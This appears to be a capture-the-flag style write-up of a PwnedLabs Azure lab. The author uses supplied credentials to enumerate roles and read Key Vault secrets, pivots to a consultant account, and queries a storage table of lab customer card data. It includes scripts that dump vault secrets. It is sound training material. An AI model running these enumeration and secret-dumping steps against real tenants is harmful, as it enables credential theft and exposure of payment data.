2. Unlock Access with Azure Key Vault
This write-up is based on PwnedLabs.io’s free module, Unlock Access with Azure Key Vault, which offers top-notch content at an unbeatable price. While I’m not affiliated with PwnedLabs.io, I highly recommend their resources. Learn more about their subscription options at PwnedLabs.io/pricing.
Lessons Learned:
- Azure Key Vault ../Azure Services/Azure Key Vault
- Azure Storage Account ../Azure Services/Azure Storage Account
- Difference Between Tenant, Subscription, etc. ../Azure General/Tenant, Subscription, Resource
Given:
Username, password, login portal, and azure Subscription ID.
Azure Subscription ID : ceff06cb-e29d-4486-a3ae-eaaec5689f94
More Info regarding Subscription ID: ../Azure General/Tenant, Subscription, Resource
2.1 Digging with GUI : Home --> Subscription.
Secrets for other users.
Settings --> Resources --> select ext-contractors --> Objects --> Keys
Alissa-suarez
Version: 1795ab47daf34979b232cddb4a387f3e
Secret Identifier:
https://ext-contractors.vault.azure.net/secrets/alissa-suarez/1795ab47daf34979b232cddb4a387f3e
********
josh-harvey
version: c5ec280997564e6da42d44797980c052
Secret Identifier
https://ext-contractors.vault.azure.net/secrets/josh-harvey/c5ec280997564e6da42d44797980c052
********
ryan-garcia
version: c391b4f777e341289df964dca2d0a2a9
Secret Identifier
https://ext-contractors.vault.azure.net/secrets/ryan-garcia/c391b4f777e341289df964dca2d0a2a9
********
https://azure.microsoft.com/en-us/products/key-vault
https://learn.microsoft.com/en-us/azure/key-vault/general/overview
2.2 Digging with pwsh azure CLI
Tab completion : ../Azure General/AZURE CLI Tab Completion
For login, use the credential from the earlier lab. 1. Azure Blob Container to Initial Access
az login
$Username = "marcus@megabigtech.com"
$Password = "*****!"
Or One liner
az login -u marcus@megabigtech.com -p *****!
Get user information `marcus@megabigtech.com
az account show
{
"environmentName": "AzureCloud",
"homeTenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
"id": "ceff06cb-e29d-4486-a3ae-eaaec5689f94",
"isDefault": true,
"managedByTenants": [],
"name": "Microsoft Azure Sponsorship",
"state": "Enabled",
"tenantDefaultDomain": "megabigtech.com",
"tenantDisplayName": "Default Directory",
"tenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
"user": {
"name": "marcus@megabigtech.com",
"type": "user"
}
}
Then import following Modules. ../Azure Services/Microsoft Graph More info regarding Microsoft Graph Powershell Module. Microsoft Graph is a gateway for many Microsoft cloud services.
Install-Module Microsoft.Graph
Import-Module Microsoft.Graph.Users
Connect-MgGraph
Install-Module Az
Import-Module Az
Connect-AzAccount
Connect-MgGraph
Get-MgContext
└─PS> az ad signed-in-user show
{
"@odata.context": "https://graph.microsoft.com/v1.0/$metadata#users/$entity",
"businessPhones": [],
"displayName": "Marcus Hutch",
"givenName": "Marcus",
"id": "41c178d3-c246-4c00-98f0-8113bd631676",
"jobTitle": "Flag: ***************",
"mail": null,
"mobilePhone": null,
"officeLocation": null,
"preferredLanguage": null,
"surname": "Hutch",
"userPrincipalName": "marcus@megabigtech.com"
}
2.3 List the groups or directory roles a user is associated with.
../Azure General/Built-in Permissions
PS> Get-MgUserMemberOf -userid "marcus@megabigtech.com" | select * -ExpandProperty additionalProperties | Select-Object {$_.AdditionalProperties["displayName"]}
$_.AdditionalProperties["displayName"]
--------------------------------------
Directory Readers
Default Directory
All Company
└─PS> az ad user get-member-groups --id "marcus@megabigtech.com" --only-show-errors [
{
"displayName": "All Company",
"id": "9ec7649c-285a-47e3-90d0-953579aa30f9"
},
{
"displayName": "Default Directory",
"id": "fc185453-0e6c-4c47-829e-22608798785a"
}
]
I tried to mimic the behavior with az but the result was missing Directory Readers. It turns out `Get-MgUserMemberOf command put out much detail information than az.
2.4 Azure Key Vault
Azure Key Vault ext-contractors was found by using the following commands. There are about Five Key types exist.
../Azure Services/Azure Key Vault
# Given subscription ID
$CurrentSubscriptionID = "ceff06cb-e29d-4486-a3ae-eaaec5689f94"
# Set output format
$OutputFormat = "table"
# Set the given subscription as the active one
& az account set --subscription $CurrentSubscriptionID
# List resources in the current subscription
& az resource list -o $OutputFormat
PS> & az resource list -o $OutputFormat
Name ResourceGroup Location Type Status
--------------- ---------------- ---------- ------------------------- --------
ext-contractors content-static-2 eastus Microsoft.KeyVault/vaults
You can do same thing with
az account set --subscription <Subscription ID>
az keyvault list
[
{
"id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.KeyVault/vaults/ext-contractors",
"location": "eastus",
"name": "ext-contractors",
"resourceGroup": "content-static-2",
"tags": {},
"type": "Microsoft.KeyVault/vaults"
}
]
The below command will give a lot more info.
az keyvault show --name <name>
2.4.1 Retrieve Password Manually
We can do this manually with az keyvault
PS> az account set --subscription $SubscriptionID
PS> az keyvault secret show --name alissa-suarez --vault-name ext-contractors
{
"attributes": {
"created": "2023-10-23T17:13:13+00:00",
"enabled": true,
"expires": null,
"notBefore": null,
"recoverableDays": 90,
"recoveryLevel": "Recoverable+Purgeable",
"updated": "2023-10-23T17:13:13+00:00"
},
"contentType": null,
"id": "https://ext-contractors.vault.azure.net/secrets/alissa-suarez/1795ab47daf34979b232cddb4a387f3e",
"kid": null,
"managed": null,
"name": "alissa-suarez",
"tags": {},
"value": "********"
}
2.4.2 Retrieve Password with Powershell
Or we can automate this with powershell.
# Set variables
$VaultName = "ext-contractors"
# Set the current Azure subscription
$SubscriptionID = "ceff06cb-e29d-4486-a3ae-eaaec5689f94"
az account set --subscription $SubscriptionID
# List and store the secrets
$secretsJson = az keyvault secret list --vault-name $VaultName -o json
$secrets = $secretsJson | ConvertFrom-Json
# List and store the keys
$keysJson = az keyvault key list --vault-name $VaultName -o json
$keys = $keysJson | ConvertFrom-Json
# Output the secrets
Write-Host "Secrets in vault $VaultName"
foreach ($secret in $secrets) {
Write-Host $secret.id
}
# Output the keys
Write-Host "Keys in vault $VaultName"
foreach ($key in $keys) {
Write-Host $key.id
}
# Set variables
$VaultName = "ext-contractors"
$SecretNames = @("alissa-suarez", "josh-harvey", "ryan-garcia")
# Set the current Azure subscription
$SubscriptionID = "ceff06cb-e29d-4486-a3ae-eaaec5689f94"
az account set --subscription $SubscriptionID
# Retrieve and output the secret values
Write-Host "Secret Values from vault $VaultName"
foreach ($SecretName in $SecretNames) {
$secretValueJson = az keyvault secret show --name $SecretName --vault-name $VaultName -o json
$secretValue = ($secretValueJson | ConvertFrom-Json).value
Write-Host "$SecretName - $secretValue"
}
2.4.3 Retrieve password with bash
https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-services/keyvault#enumeration
#!/bin/bash
# Dump all keyvaults from the subscription
# Define Azure subscription ID
AZ_SUBSCRIPTION_ID="your-subscription-id"
# Specify the filename for output
CSV_OUTPUT="vault-names-list.csv"
# Login to Azure account
az login
# Select the desired subscription
az account set --subscription $AZ_SUBSCRIPTION_ID
# Retrieve all resource groups within the subscription
AZ_RESOURCE_GROUPS=$(az group list --query "[].name" -o tsv)
# Initialize the CSV file with headers
echo "Vault Name,Associated Resource Group" > $CSV_OUTPUT
# Iterate over each resource group
for GROUP in $AZ_RESOURCE_GROUPS
do
# Fetch key vaults within the current resource group
VAULT_LIST=$(az keyvault list --resource-group $GROUP --query "[].name" -o tsv)
# Process each key vault
for VAULT in $VAULT_LIST
do
# Extract the key vault's name
VAULT_NAME=$(az keyvault show --name $VAULT --resource-group $GROUP --query "name" -o tsv)
# Append the key vault name and its resource group to the file
echo "$VAULT_NAME,$GROUP" >> $CSV_OUTPUT
done
done
2.5 Verify the user
The following command will retrieves a list of users from Azure Entra ID for a specific tenant.
# Identified all tenants where the given account has access.
az account list --all
# List users.
az ad user list
#Or Powershell command to retreive specific information.
az ad user list --query "[?givenName=='Alissa'|| givenName=='Josh' || givenName=='Ryan'].{Name:displayName, UPN:userPrincipalName,JobTitle:jobTitle, Id:id}"
[
{
"Id": "6470f625-41ce-4233-a621-fad0aa0b7300",
"JobTitle": "Consultant (Customer DB Migration Project)",
"Name": "Josh Harvey (Consultant)",
"UPN": "ext.josh.harvey@megabigtech.com"
}
]
# Another way to retreive ObjectID
└─PS> Get-MgUser -UserId ext.josh.harvey@megabigtech.com
└─PS> az ad user show --id "ext.josh.harvey@megabigtech.com"
2.5.1 Check assigned user group.
PS> $UserId = '6470f625-41ce-4233-a621-fad0aa0b7300'
Get-MgUserMemberOf -userid $userid | select * -ExpandProperty additionalProperties | Select-Object {$_.AdditionalProperties["displayName"]}
$_.AdditionalProperties["displayName"]
--------------------------------------
CUSTOMER-DATABASE-ACCESS
Directory Readers
Default Directory
Once again, I tried to mimic the command with az. However, az command does not capture Directory Readers.
PS> az ad user get-member-groups --id ext.josh.harvey@megabigtech.com
[
{
"displayName": "Default Directory",
"id": "fc185453-0e6c-4c47-829e-22608798785a"
},
{
"displayName": "CUSTOMER-DATABASE-ACCESS",
"id": "79b430a5-ea4d-4de6-855b-908bdfb052dc"
}
]
From gui this can be verified as well.
Go to Service --> Groups --> select CUSTOMER-DATABASE-ACCESS
group objectID, 79b430a5-ea4d-4de6-855b-908bdfb052dc
2.6 Check User permission
Check permission of User Marcus
PS> az role assignment list --include-groups --all | Convertfrom-json|select-object roleDefinitionName,principalName
roleDefinitionName principalName
------------------ -------------
Key Vault Administrator ian_cloudpwned.com#EXT#@iancloudpwned.onmicrosoft.com
Key Vault Reader marcus@megabigtech.com
Key Vault Secrets User marcus@megabigtech.com
OR
Connect-AzAccount
Get-AzRoleAssignment -Scope "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94" | Select-Object DisplayName, RoleDefinitionName
DisplayName RoleDefinitionName
----------- ------------------
Ian Austin Key Vault Administrator
Marcus Hutch Key Vault Reader
Marcus Hutch Key Vault Secrets User
Login with Harvey
Once Login with Harvey's credential, I was able to see more assigned roles.
az login -u *****harvey@megabigtech.com -p *****
-----
PS> Connect-AzAccount
Subscription name Tenant
----------------- ------
Microsoft Azure Sponsorship Default Directory
ext.josh.harvey@megabigtech.com
The following indicates that Josh Harvey is Reader.
Based on ../Azure General/Built-in Permissions , the Reader role in Azure grants read-only access to Azure resources. However, the CUSTOMER-DATABASE-ACCESS group has Customer Database Access role.
PS> Get-AzRoleAssignment -Scope "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94" | Select-Object DisplayName, RoleDefinitionName
DisplayName RoleDefinitionName
----------- ------------------
Ian Austin Key Vault Administrator
Marcus Hutch Key Vault Reader
Marcus Hutch Key Vault Secrets User
Josh Harvey (Consultant) Reader
CUSTOMER-DATABASE-ACCESS Customer Database Access
IT-HELPDESK Reader
Security User Storage Blob Data Reader
Security User Reader
Azure Security Insights Microsoft Sentinel Automation Contributor
c7bf3d89f766471691ccdf29 Log Analytics Contributor
c7bf3d89f766471691ccdf29 Monitoring Contributor
c7bf3d89f766471691ccdf29 Monitoring Contributor
c7bf3d89f766471691ccdf29 Log Analytics Contributor
...snip
2.7 Get Role Permission for Customer Database Access
This will drop all info.
az role definition list|ConvertFrom-Json|Select-Object rolename
This commands can be tailored
PS> az role definition list --custom-role-only true --query "[?roleName=='Customer Database Access']"|ConvertFrom-Json
assignableScopes : {/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2}
createdBy : 18600f1a-3cee-434e-860f-aff4078da055
createdOn : 10/23/2023 6:42:46PM
description : Provides access to the Mega Big Tech customer list and information about customers
id : /subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/providers/Microsoft.Authorization/roleDefinitions/53c88309-94d8-4b15-9c6b-f64a166f4ef
0
name : 53c88309-94d8-4b15-9c6b-f64a166f4ef0
permissions : {@{actions=System.Object[]; condition=; conditionVersion=; dataActions=System.Object[]; notActions=System.Object[];
notDataActions=System.Object[]}}
roleName : Customer Database Access
roleType : CustomRole
type : Microsoft.Authorization/roleDefinitions
updatedBy : 18600f1a-3cee-434e-860f-aff4078da055
updatedOn : 10/24/2023 10:10:35AM
Check the Storage accounts in the account.
More about Azure Storage Account.
../Azure Services/Azure Storage Account
2.7.1 Get Storage and table information
PS> az storage account list --query "[].name"
[
"custdatabase",
"mbtwebsite",
"securityconfigs"
]
PS> az storage account list|ConvertFrom-Json|select-object name
name
----
custdatabase
mbtwebsite
securityconfigs
We can get the same information from the Storage Accounts.
and search for any tables exsit in the custdatabase.
PS> az storage table list --account-name custdatabase --output table --auth-mode login
Name
---------
customers
2.7.2 Query table information
az storage entity query --table-name customers --account-name custdatabase --output table --auth-mode login
PartitionKey RowKey Card_expiry Card_number Customer_id Customer_name Cvv
-------------- -------- ------------- ---------------- ------------------------------------ -------------------------------------- -----
1 1 10/30 5425233430109903 07244ad0-c228-43d8-a48e-1846796aa6ad SecureBank Holdings 543
1 10 01/30 4347866885036101 cba21bec-7e8d-4394-a145-ea7f6131a998 InnoVenture 781
1 2 09/29 4012000033330026 66d7a744-5eb6-4b1b-9e70-a36824366534 NeuraHealth 452
1 3 05/31 4657490028942036 6a88c0ff-b79c-4842-92f1-f25d53c5cbe4 DreamScreen Entertainment 683
1 4 01/29 4657493919180161 14fb331d-a82e-41f8-8f20-d630f312dd3e InfiNet Solutions 855
1 5 08/29 4657490203402673 cdf53341-b806-4f69-a1e2-7b632b1d405d Skyward Aerospace 344
1 6 12/30 4594045518310163 c6e6418b-fc4e-4f7b-a463-1a3bc6551cd3 Quasar Analytics Inc 145
1 7 02/29 4594055970518286 fc4f9042-5b94-4a79-b18a-40fa621fe2e1 DataGuard Inc 243
1 8 06/30 4698558990398121 07a2cfae-16de-41a9-af51-b9cd9f077800 Huge Logistics 546
1 9 03/30 4698559508013566 512df22d-815f-4f98-92af-a615a92ea39d SmartMove Robotics 992
1 99 Flag: *****